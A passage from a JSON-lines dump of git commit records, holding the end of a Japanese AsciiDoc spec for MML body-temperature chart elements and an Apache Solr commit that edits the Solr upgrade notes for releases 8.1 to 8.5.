+\n\u3010\u30c7\u30fc\u30bf\u578b\u3011decimal +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.3.3. mmlFs:intakeUnit\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u3057\u305f\u98df\u3079\u7269\u30fb\u98f2\u307f\u7269\u306e\u5358\u4f4d\u3002\/10, ml, g, kcal, \u306a\u3069 +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb\u3011mmlFs02\n\n===== M23.3.4. mmlFs:intakePathway\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u7d4c\u8def\u3002\u7d4c\u53e3\u6442\u53d6\u3001\u7d4c\u7ba1\u3001IVH\u7ba1\u7406\u306a\u3069 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.3.5. mmlFs:intakeStartTime\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u958b\u59cb\u6642\u9593\u3002\u89b3\u5bdf\u3092\u958b\u59cb\u3057\u305f\u6642\u9593\u3092\u8a18\u9332\u3059\u308b\u3002\u958b\u59cb\u3001\u7d42\u4e86\u306e\u5225\u306a\u304f\u8a18\u9332\u3092\u3059\u308b\u5834\u5408\u306b\u306f\u3053\u3061\u3089\u306b\u6642\u9593\u3092\u8a18\u5165\u3059\u308b\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.3.6. mmlFs:intakeEndTime\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u7d42\u4e86\u6642\u9593\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.3.7. mmlFs:intakeMemo\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u72b6\u6cc1\u306b\u95a2\u3059\u308b\u30b3\u30e1\u30f3\u30c8\u30fb\u30e1\u30e2\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4. mmlFs:bodilyOutput\n\u3010\u5185\u5bb9\u3011\u4f53\u5916\u306b\u6392\u6cc4\u3055\u308c\u308b\u3082\u306e\u306b\u3064\u3044\u3066\u8a18\u9332\u3059\u308b\u89aa\u30a8\u30ec\u30e1\u30f3\u30c8\u3002\u5c3f\u3001\u4fbf\u4ee5\u5916\u306b\u3082\u80f8\u6c34\u3001\u8179\u6c34\u3001\u4f53\u6db2\u3001\u80c6\u6c41\u3001\u305d\u306e\u4ed6\u306e\u5206\u6ccc\u7269\u306a\u3069\u3082\u5bfe\u51e6\u3068\u3059\u308b\u3002 +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef +\n\u3010\u7e70\u308a\u8fd4\u3057\u8a2d\u5b9a\u30110\u56de\u4ee5\u4e0a\u7e70\u308a\u8fd4\u3057\u3042\u308a\u3002\n\n===== M23.4.1. mmlFs:boType\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u7a2e\u985e\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u4e0d\u53ef +\n\u3010\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb\u3011mmlFs03\n\n===== M23.4.2. mmlFs:boVolume\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u91cf\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011decimal +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.3. mmlFs:boUnit\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u91cf\u306e\u5358\u4f4d\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef +\n\u3010\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb\u3011mmlFs04\n\n===== M23.4.4. mmlFs:boStatus\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u6027\u72b6\u3002\u8edf\u4fbf\u3001\u4e0b\u75e2\u3001\u6df7\u6fc1\u306a\u3069\u3002\u5927\u91cf\u30fb\u4e2d\u7b49\u91cf\u3001\u5c11\u91cf\u306a\u3069\u6570\u5024\u5316\u3067\u304d\u306a\u3044\u5834\u5408\u306b\u306f\u3053\u3053\u306b\u8a18\u8f09\u3059\u308b\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.5. mmlFs:boColor\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u8272\u8abf\u3002\u9ec4\u8272\u3001\u8336\u8910\u8272\u306a\u3069\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.6. mmlFs:pathway\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7d4c\u8def\u3001\u30ab\u30c6\u30fc\u30c6\u30eb\u3084\u30c9\u30ec\u30fc\u30f3\u3001\u30b9\u30c8\u30de\u306a\u3069 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.7. mmlFs:boStartTime\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u958b\u59cb\u6642\u9593\u3002\u89b3\u5bdf\u3092\u958b\u59cb\u3057\u305f\u6642\u9593\u3092\u8a18\u9332\u3059\u308b\u3002\u958b\u59cb\u3001\u7d42\u4e86\u306e\u5225\u306a\u304f\u8a18\u9332\u3092\u3059\u308b\u5834\u5408\u306b\u306f\u3053\u3061\u3089\u306b\u6642\u9593\u3092\u8a18\u5165\u3059\u308b\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.8. mmlFs:boEndTime\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7d42\u4e86\u6642\u9593\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.8. mmlFs:boMemo\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306b\u95a2\u3059\u308b\u30b3\u30e1\u30f3\u30c8\u3001\u30e1\u30e2\u3002\u4fbf\u79d83\u65e5\u76ee\u3001\u51fa\u8840\u306f\u53ce\u675f\u50be\u5411\u306a\u3069\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.9. mmlFs:boFrequency\n\u3010\u5185\u5bb9\u3011\u4e00\u5b9a\u6642\u9593\u5185\u306e\u6392\u6cc4\u56de\u6570\u3092\u8868\u73fe\u3059\u308b\u89aa\u30a8\u30ec\u30e1\u30f3\u30c8\u3002 +\n\u3010\u7e70\u308a\u8fd4\u3057\u30110\u56de\u4ee5\u4e0a\u306e\u7e70\u308a\u8fd4\u3057\u3042\u308a\n\n===== M23.4.10. mmlFs:bofTimes\n\u3010\u5185\u5bb9\u3011\u4e00\u5b9a\u671f\u9593\u5185\u306b\u89b3\u5bdf\u3055\u308c\u305f\u6392\u6cc4\u56de\u6570\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011decimal +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.10.1. mmlFs:bofPeriodStartTime\n\u3010\u5185\u5bb9\u3011\u89b3\u5bdf\u3092\u958b\u59cb\u3057\u305f\u6642\u9593\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.10.2. mmlFs:bofPeriodEndTime\n\u3010\u5185\u5bb9\u3011\u89b3\u5bdf\u3092\u7d42\u4e86\u3057\u305f\u6642\u9593\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.10.3 mmlFs:bofMemo\n\u3010\u5185\u5bb9\u3011\u6570\u5024\u5316\u3055\u308c\u306a\u3044\u983b\u5ea6\u8868\u73fe\u3002\u983b\u56de\u3001\u4e4f\u5c3f\u306a\u3069\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.10.4. mmlFs:fsMemo\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u30b3\u30e1\u30f3\u30c8\u3001\u30e1\u30e2\u3002\u305d\u306e\u4ed6\u306e\u4f53\u6e29\u8868\u306b\u8a18\u8f09\u3059\u308b\u5185\u5bb9\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7e70\u308a\u8fd4\u3057\u3011\u7701\u7565\u53ef\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"74b9ba396c670cff7b738563475a92b8051f6690","subject":"SOLR-14147: comment out for now link to security manager docs in upgrade notes that don't exist on master","message":"SOLR-14147: comment out for now link to security manager docs in upgrade notes that don't exist on master\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"solr\/solr-ref-guide\/src\/solr-upgrade-notes.adoc","new_file":"solr\/solr-ref-guide\/src\/solr-upgrade-notes.adoc","new_contents":"= Solr Upgrade Notes\n:page-children: major-changes-in-solr-9, major-changes-in-solr-8, major-changes-in-solr-7, major-changes-from-solr-5-to-solr-6\n:page-toclevels: 3\n:page-tocclass: right\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\nThe following notes describe changes to Solr in recent releases that you should be aware of before upgrading.\n\nThese notes highlight the biggest changes that may impact the largest number of\nimplementations. It is not a comprehensive list of all changes to Solr in any release.\n\nWhen planning your Solr upgrade, consider the customizations you have made to\nyour system and review the {solr-javadocs}\/changes\/Changes.html[`CHANGES.txt`]\nfile found in your Solr package. That file includes all the changes and updates\nthat may effect your existing implementation.\n\nDetailed steps for upgrading a Solr cluster are in the section <<upgrading-a-solr-cluster.adoc#upgrading-a-solr-cluster,Upgrading a Solr Cluster>>.\n\n== Upgrading to 9.x Releases (NOT RELEASED)\n\n\/\/ DEVS: please put 9.0 Upgrade Notes in `major-changes-in-solr-9.adoc`!.\n\n== Upgrading to 8.x Releases\n\nIf you are upgrading from 7.x, see the section <<Upgrading from 7.x Releases>> below.\n\n=== Solr 8.5\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote85[8.5 Release Notes]\nfor an overview of the main new features of Solr 8.5.\n\nWhen upgrading to 8.5.x users should be aware of the following major changes from 8.4.\n\n*Considerations for a SolrCloud Upgrade*\n\nSolr 8.5 introduces a change in the format used for the elements in the Overseer queues and maps (see https:\/\/issues.apache.org\/jira\/browse\/SOLR-14095[SOLR-14095] for technical discussion of the change). This queue is used internally by the Overseer to reliably handle\noperations, to communicate operation results between the Overseer and the coordinator node, and by the REQUESTSTATUS API for displaying information about async Collection operations.\n\nThis change won\u2019t require you to change any client-side code you should see no differences on the client side.\nHowever, it does require some care when upgrading an existing SolrCloud cluster depending on your upgrade strategy.\n\nIf you are upgrading Solr with an atomic restart strategy:\n\n* If you don\u2019t use async or REQUESTSTATUS operations, you should be able to restart and not see any issues.\n* If you do use Collection API operations:\n. Pause Collection API operations.\n. Cleanup queues (See the section <<collections-api.adoc#deletestatus,DELETESTATUS>> for examples)\nif you use async operations.\n. Upgrade and restart the nodes.\n. Resume all normal operations.\n\nIf you are upgrading Solr with a rolling restart strategy:\n\n* If you don\u2019t use Collection API operations, you should be able to do a rolling restart and not see\nany issues.\n* If you do use Collection API operations, but you can pause their use during the restart the easiest\nway is to:\n. Pause Collection API operations.\n. Upgrade and restart all nodes.\n. Cleanup queues (See the section <<collections-api.adoc#deletestatus,DELETESTATUS>> for examples)\nif you use async operations.\n. Resume all normal operations.\n\nIf you use Collection API operations and can\u2019t pause them during the upgrade:\n\n. Start 8.5 nodes with the system property: `-Dsolr.useUnsafeOverseerResponse=deserialization`. Ensure the\nOverseer node is upgraded last.\n. Once all nodes are in 8.5 and once you don\u2019t need to read old status anymore, restart again removing the\nsystem property.\n\nIf you prefer to keep the old (but insecure) serialization strategy, you can start your nodes using the system\nproperty: `-Dsolr.useUnsafeOverseerResponse=true`. Keep in mind that this will be removed in future version of Solr.\n\n*Security Manager*\n\nSolr now has the ability to run with a Java security manager enabled. To enable this, set the property `SOLR_SECURITY_MANAGER_ENABLED=true` in `solr.in.sh` or `solr.in.cmd`. Note that if you are using HDFS to store indexes, you cannot enable the security manager.\n\nIn Solr 9.0, this will be the default.\n\n\/\/ See SOLR-14147: See also the section <<securing-solr.adoc#enable-security-manager,Enable Security Manager>>.\n\n*Block\/Allow Specific IPs*\n\nSolr has two new parameters to allow you to restrict access to Solr using IP addresses. Use `SOLR_IP_WHITELIST` to configure a whitelist, and `SOLR_IP_BLACKLIST` to configure a blacklist. These properties are defined in `solr.in.sh` or `solr.in.cmd`.\n\nSee also the section <<securing-solr.adoc#enable-ip-access-control,Enable IP Access Control>>.\n\n*BlockJoin Facet Deprecation*\n\nThe BlockJoinFacetComponent is marked for deprecation and will be removed in 9.0.\nUsers are encouraged to migrate to `uniqueBlock()` in JSON Facet API.\nMore information about this is available in the section <<json-faceting-domain-changes.adoc#block-join-domain-changes,Block Join Domain Changes>>.\n\n*Caching with the Boolean Query Parser*\n\nBy default, the <<other-parsers.adoc#boolean-query-parser,Boolean Query Parser>> caches queries in Solr's filterCache. It's now possible to disable this with the local param `cache=false`.\n\n*Indexing Log Files*\n\nSolr now includes a command line tool, `bin\/postlogs` which will index Solr's log files into a collection.\nThis provides an easy way to use Solr or visualization tools (such as Zeppelin) to troubleshoot problems with the system.\n\nThis tool is not yet officially documented in the Reference Guide, but draft documentation is available in a branch and can be accessed https:\/\/github.com\/apache\/lucene-solr\/blob\/visual-guide\/solr\/solr-ref-guide\/src\/logs.adoc[via GitHub].\n\n*Highlighting*\n\nSolr's Unified Highlighter now has two parameters to help control passage sizing, `hl.fragAlignRatio` and `hl.fragsizeIsMinimum`. See the section <<highlighting.adoc#the-unified-highlighter,The Unified Highlighter>> for details about these new parameters.\n\n*Shared Library System Parameter*\n\nSolr's `solr.xml` file has long had support for a `sharedLib` parameter, which allows you to define a common location for .jar files that may need to be in the path for all cores.\n\nThis property can now be defined in `solr.in.sh` or `solr.in.cmd` as a system property (`-Dsolr.sharedLib=\/path\/to\/lib`) added to `SOLR_OPTS` (see `solr.in.sh` or `solr.in.cmd` for details).\n\n=== Solr 8.4\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote84[8.4 Release Notes]\nfor an overview of the main new features of Solr 8.4.\n\nWhen upgrading to 8.4.x users should be aware of the following major changes from 8.3.\n\n*Package Management System*\n\nVersion 8.4 introduces a package management system to Solr. The goals of the\nsystem are to allow hot (live) deployment of plugins, provide packaging\nguidelines for plugins, and standardize Solr's approach by following familiar\nconcepts used in other package management systems.\n\nThe system is designed to eventually replace use of the `<lib ..\/>` directive,\nthe Blob Store, and other methods of deploying plugins and custom components\nto Solr.\n\nThe system is currently considered experimental, so use with caution. It must\nbe enabled with a system parameter passed at start up before it can be used.\nFor details, please see the section <<package-manager.adoc#package-manager,Package Management>>.\n\nWith this feature Solr's <<adding-custom-plugins-in-solrcloud-mode.adoc#adding-custom-plugins-in-solrcloud-mode,Blob Store>>\nfunctionality is now deprecated and will likely be removed in 9.0.\n\n*Security*\n\nThe follow mix of changes were all made with the intention of making Solr more secure out of the box.\n\n* The `solrconfig.xml` file in Solr's `_default` configset has been trimmed of\n the following previously pre-configured items:\n+\n** All `<lib ...\/>` directives. This means that Solr Cell (aka Tika), Learning\nto Rank, Clustering (with Carrot2), language identification, and Velocity (for\nthe `\/browse` sample search interface) are no longer enabled out of the box.\n** The `\/browse`, `\/tvrh`, and `\/update\/extract` request handlers.\n** The Term Vector Component.\n** The XSLT and Velocity response writers.\n+\nAll of these items can be added to your Solr implementation by manually editing\n`solrconfig.xml` to add them back in, or use the <<config-api.adoc#config-api,Config API>>.\n+\nThe `sample_techproducts_configs` and the examples found in `.\/example` are unchanged.\n\n* Configsets that have been uploaded with an unsecured Configset API (i.e., when authentication is not enabled) are considered \"Untrusted Configsets\".\n+\nIn order to bolster Solr's out-of-the-box security, these untrusted configsets\nare no longer allowed to use the `<lib ...\/>` directive to implement contribs\nor custom Jars.\n+\nWhen upgrading to 8.4, if you are using untrusted configsets that contain `<lib ..\/>`\ndirectives, their corresponding collections will not load (they will cease to\nwork). You have a few options in this case:\n\n** You can secure your Solr instance with <<authentication-and-authorization-plugins.adoc#authentication-and-authorization-plugins,authentication>>\nand re-upload the configset (using the `bin\/solr zk upconfig ...`\n<<solr-control-script-reference.adoc#solr-control-script-reference,Solr CLI>> command);\n** You can put your custom Jars in Solr's classpath instead of `lib` directories;\n** You can try the new package management system to manage your custom Jars.\n+\nSee the section <<configsets-api.adoc#configsets-upload,Upload a Configset>>\n for more details about trusted vs. untrusted configsets.\n\n* Our default Jetty configuration has been updated to now set a\nContent-Security-Policy (CSP) by default. See `.\/server\/etc\/jetty.xml` for\ndetails about how it is configured.\n+\nAs a result of this change, any custom HTML served by Solr's HTTP server that contains inline Javascript will no longer execute in modern browsers. The options for you are:\n\n** Change your JavaScript code to not run inline any longer;\n** Edit `jetty.xml` to remove CSP (creating weaker security protection);\n** Remove\/alter the headers with a reverse proxy.\n\n* Solr's Blob Store and runtime libs functionality are now deprecated and are planned to be removed from Solr in version 9.0. It has been replaced with the new package management system.\n\n* The Velocity response writer is also now deprecated and is planned to be removed from Solr in version 9.0.\n\n*Using Collapse with Group Disallowed*\n\nUsing the <<collapse-and-expand-results.adoc#collapse-and-expand-results,CollapsingQueryParser>>\nwith <<result-grouping.adoc#result-grouping,Result Grouping>> has never been\nsupported as it causes inconsistent behavior and NullPointerException errors.\nWe have now explicitly disallowed this combination to prevent these errors.\nIf you are using these together, you will need to modify your queries.\n\n*SolrJ*\n\n* SolrJ now supports the `shards.preference` parameter for single-shard\nscenarios to ensure multi-shard and single-shard request routing works in the same way.\n+\nSee <<using-solrj.adoc#cloud-request-routing,Cloud Request Routing>> and\n<<distributed-requests.adoc#shards-preference-parameter,shards.preference Parameter>> for details.\n\n* `QueryResponse.getExplainMap()` type has changed from `Map<String, String>` to `Map<String, Object>` in order to support structured explanations.\n+\nThis change is expected to be mostly back-compatible. Compiled third-party\ncomponents will work the same due to type erasure, but source code changes may\nbe required.\n\n* Replica routing code has been moved to SolrJ, making those classes available\nto clients if necessary.\n\n*Streaming Expressions*\n\n* A new DBSCAN clustering streaming evaluator has been added.\n\n* The `precision` stream evaluator can now operate on matrices.\n\n* The `random` streaming expression can now create the x-axis.\n\n*JSON Facets*\n\n* Two new aggregations have been added: `missing` and `countvals`.\n\n* Several aggregations now support multi-valued fields: `min`, `max`, `avg`, `sum`, `sumsq`, `stddev`, `variance`, and `percentile`.\n\n*Caches*\n\n* After the addition of `CaffeineCache` in 8.3, legacy SolrCache\nimplementations are deprecated and likely to be removed in 9.0.\n+\nUsers are encouraged to transition their cache configurations to use\n`org.apache.solr.search.CaffeineCache` as soon as feasible.\n\n=== Solr 8.3\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote83[8.3 Release Notes] for an overview of the main new features of Solr 8.3.\n\nWhen upgrading to 8.3.x users should be aware of the following major changes from 8.2.\n\n*JWT Authentication*\n\nJWT Authentication now supports multiple identity providers.\nTo allow this, the parameter `jwkUrl` has been deprecated and replaced with `jwksUrl`.\nImplementations using `jwkUrl` will continue to work as normal, but users\n should plan to transition their configurations to use `jwksUrl` instead as\n soon as feasible.\n\n*Caches*\n\n* Solr has a new cache implementation, `CaffeineCache`, which is now recommended over other caches. This cache is expected to generally provide most users lower memory footprint, higher hit ratio, and better multi-threaded performance.\n+\nSince caching has a direct impact on the performance of your Solr\n implementation, before switching to any new cache implementation in\n production, take care to test for your environment and traffic patterns so\n you fully understand the ramifications of the change.\n\n* A new parameter, `maxIdleTime`, allows automatic eviction of cache items that have not been used in the defined amount of time. This allows the cache to release some memory and should aid those who want or need to fine-tune their caches.\n\nSee the section <<query-settings-in-solrconfig.adoc#query-settings-in-solrconfig,Query Settings in SolrConfig>> for more details about these and other cache options and parameters.\n\n=== Solr 8.2\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote82[8.2 Release Notes] for an overview of the main new features of Solr 8.2.\n\nWhen upgrading to 8.2.x, users should be aware of the following major changes from v8.1.\n\n*ZooKeeper 3.5.5*\n\nSolr 8.2 updates the version of ZooKeeper included with Solr to v3.5.5.\n\nIt is recommended that external ensembles set up to work with Solr also be updated to ZooKeeper 3.5.5.\n\nThis ZooKeeper release includes many new security features.\nIn order for Solr's Admin UI to work with 3.5.5, the `zoo.cfg` file must allow access to ZooKeeper's \"four-letter commands\".\nAt a minimum, `ruok`, `conf`, and `mntr` must be enabled, but other commands can optionally be enabled if you choose.\nSee the section <<setting-up-an-external-zookeeper-ensemble.adoc#configuration-for-a-zookeeper-ensemble,Configuration for a ZooKeeper Ensemble>> for details.\n\n[WARNING]\nUntil 8.3, https:\/\/issues.apache.org\/jira\/browse\/SOLR-13672[SOLR-13672] causes the ZK Status screen in the Admin UI to not be able to report status. This only impacts the UI, ZooKeeper still operates correctly.\n\n*Routed Aliases*\n\n* Routed aliases now use collection properties to identify collections that belong to the alias; prior to 8.2, these aliases used core properties.\n+\nThis is backward-compatible and aliases created with prior versions will\n continue to work. However, new collections will no longer add the\n `routedAliasName` property to the `core.properties` file so any external code\n depending on this location will need to be updated.\n\n\/\/ TODO: aliases.adoc still says this is per-core?\n\n* Time-routed aliases now include a `TRA` infix in the collection name, in the pattern `<alias>_TRA_<timestamp>`. +\nCollections created with older versions will continue to work.\n\n*Distributed Tracing Support*\n\nThis release adds support for tracing requests in Solr. Please review the section <<solr-tracing.adoc#solr-tracing,Distributed Solr Tracing>> for details on how to configure this feature.\n\n=== Solr 8.1\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote810[8.1 Release Notes] for an overview of the main new features of Solr 8.1.\n\nWhen upgrading to 8.1.x, users should be aware of the following major changes from v8.0.\n\n*Global maxBooleanClauses Parameter*\n\n* The behavior of the `maxBooleanClauses` parameter has changed to reduce the risk of exponential query expansion when dealing with pathological query strings.\n+\nA default upper limit of 1024 clauses is now enforced at the node level. This was the default prior to 7.0, and it can be overridden with a new global parameter in `solr.xml`. This limit will be enforced for all queries whether explicitly defined by the user (or client), or created by Solr and Lucene internals.\n+\nAn identical parameter is available in `solrconfig.xml` for limiting the size of queries explicitly defined by the user (or client), but this per-collection limit will still be restricted by the global limit set in `solr.xml`.\n+\nIf your use case demands that you a lot of OR or AND clauses in your queries, upon upgrade to 8.1 you may need to adjust the global `maxBooleanClauses` parameter since between 7.0 and 8.1 the limit was effectively unbounded.\n+\nFor more information about the new parameter, see the section <<format-of-solr-xml.adoc#global-maxbooleanclauses,Format of solr.xml: maxBooleanClauses>>.\n\n*Security*\n\n* JSON Web Tokens (JWT) are now supported for authentication. These allow Solr to assert a user is already authenticated via an external identity provider, such as an OpenID Connect-enabled IdP. For more information, see the section <<jwt-authentication-plugin.adoc#jwt-authentication-plugin,JWT Authentication Plugin>>.\n\n* A new security plugin for audit logging has been added. A default class `SolrLogAuditLoggerPlugin` is available and configurable in `security.json`. The base class is also extendable for adding custom audit plugins if needed. See the section <<audit-logging.adoc#audit-logging,Audit Logging>> for more information.\n\n*Collections API*\n\n* The output of the REQUESTSTATUS command in the Collections API will now include internal asynchronous requests (if any) in the \"success\" or \"failed\" keys.\n\n* The CREATE command will now return the appropriate status code (4xx, 5xx, etc.) when the command has failed. Previously, it always returned `0`, even in failure.\n\n* The MODIFYCOLLECTION command now accepts an attribute to set a collection as read-only. This can be used to block a collection from receiving any updates while still allowing queries to be served. See the section <<collection-management.adoc#modifycollection,MODIFYCOLLECTION>> for details on how to use it.\n\n* A new command RENAME allows renaming a collection by setting up a one-to-one alias using the new name. For more information, see the section <<collection-management.adoc#rename,RENAME>>.\n\n* A new command REINDEXCOLLECTION allows indexing existing stored fields from a source collection into a new collection. For more information, please see the section <<collection-management.adoc#reindexcollection,REINDEXCOLLECTION>>.\n\n*Logging*\n\n* The default Log4j2 logging mode has been changed from synchronous to asynchronous. This will improve logging throughput and reduce system contention at the cost of a _slight_ chance that some logging messages may be missed in the event of abnormal Solr termination.\n+\nIf even this slight risk is unacceptable, the Log4j configuration file found in `server\/resources\/log4j2.xml` has the synchronous logging configuration in a commented section and can be edited to re-enable synchronous logging.\n\n*Metrics*\n\n* The SolrGangliaReporter has been removed from Solr. The metrics library used by Solr, Dropwizard Metrics, was updated to version 4, and Ganglia support was removed from it due to a dependency on the LGPL license.\n\n*Browse UI (Velocity)*\n\n* Velocity and Velocity Tools were both upgraded as part of this release. Velocity upgraded from 1.7 to 2.0. Please see https:\/\/velocity.apache.org\/engine\/2.0\/upgrading.html about upgrading. Velocity Tools upgraded from 2.0 to 3.0. For more details, please see https:\/\/velocity.apache.org\/tools\/3.0\/upgrading.html for details about the upgrade.\n\n*Default Garbage Collector (GC)*\n\n* Solr's default GC has been changed from CMS to G1. If you prefer to use CMS or any other GC method, you can modify the `GC_TUNE` section of `solr.in.sh` (*nix) or `solr.in.cmd` (Windows).\n\n\n== Upgrading from 7.x Releases\n\nThe upgrade from 7.x to Solr 8.0 introduces several major changes that you should be aware of before upgrading.\nThese changes are described in the section <<major-changes-in-solr-8.adoc#major-changes-in-solr-8,Major Changes in Solr 8>>. It's strongly recommended that you do a thorough review of that section before starting your upgrade.\n\n[NOTE]\nIf you run in SolrCloud mode, you must be on Solr version 7.3 or higher in order to upgrade to 8.x.\n\n== Upgrading from Pre-7.x Versions\n\nUsers upgrading from versions of Solr prior to 7.x are strongly encouraged to consult {solr-javadocs}\/changes\/Changes.html[`CHANGES.txt`] for the details of _all_ changes since the version they are upgrading from.\n\nThe upgrade from Solr 6.x to Solr 7.0 introduced several *major* changes that you should be aware of before upgrading. Please do a thorough review of the section <<major-changes-in-solr-7.adoc#major-changes-in-solr-7,Major Changes in Solr 7>> before starting your upgrade.\n\nA summary of the significant changes between Solr 5.x and Solr 6.0 is in the section <<major-changes-from-solr-5-to-solr-6.adoc#major-changes-from-solr-5-to-solr-6,Major Changes from Solr 5 to Solr 6>>.\n","old_contents":"= Solr Upgrade Notes\n:page-children: major-changes-in-solr-9, major-changes-in-solr-8, major-changes-in-solr-7, major-changes-from-solr-5-to-solr-6\n:page-toclevels: 3\n:page-tocclass: right\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\nThe following notes describe changes to Solr in recent releases that you should be aware of before upgrading.\n\nThese notes highlight the biggest changes that may impact the largest number of\nimplementations. It is not a comprehensive list of all changes to Solr in any release.\n\nWhen planning your Solr upgrade, consider the customizations you have made to\nyour system and review the {solr-javadocs}\/changes\/Changes.html[`CHANGES.txt`]\nfile found in your Solr package. That file includes all the changes and updates\nthat may effect your existing implementation.\n\nDetailed steps for upgrading a Solr cluster are in the section <<upgrading-a-solr-cluster.adoc#upgrading-a-solr-cluster,Upgrading a Solr Cluster>>.\n\n== Upgrading to 9.x Releases (NOT RELEASED)\n\n\/\/ DEVS: please put 9.0 Upgrade Notes in `major-changes-in-solr-9.adoc`!.\n\n== Upgrading to 8.x Releases\n\nIf you are upgrading from 7.x, see the section <<Upgrading from 7.x Releases>> below.\n\n=== Solr 8.5\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote85[8.5 Release Notes]\nfor an overview of the main new features of Solr 8.5.\n\nWhen upgrading to 8.5.x users should be aware of the following major changes from 8.4.\n\n*Considerations for a SolrCloud Upgrade*\n\nSolr 8.5 introduces a change in the format used for the elements in the Overseer queues and maps (see 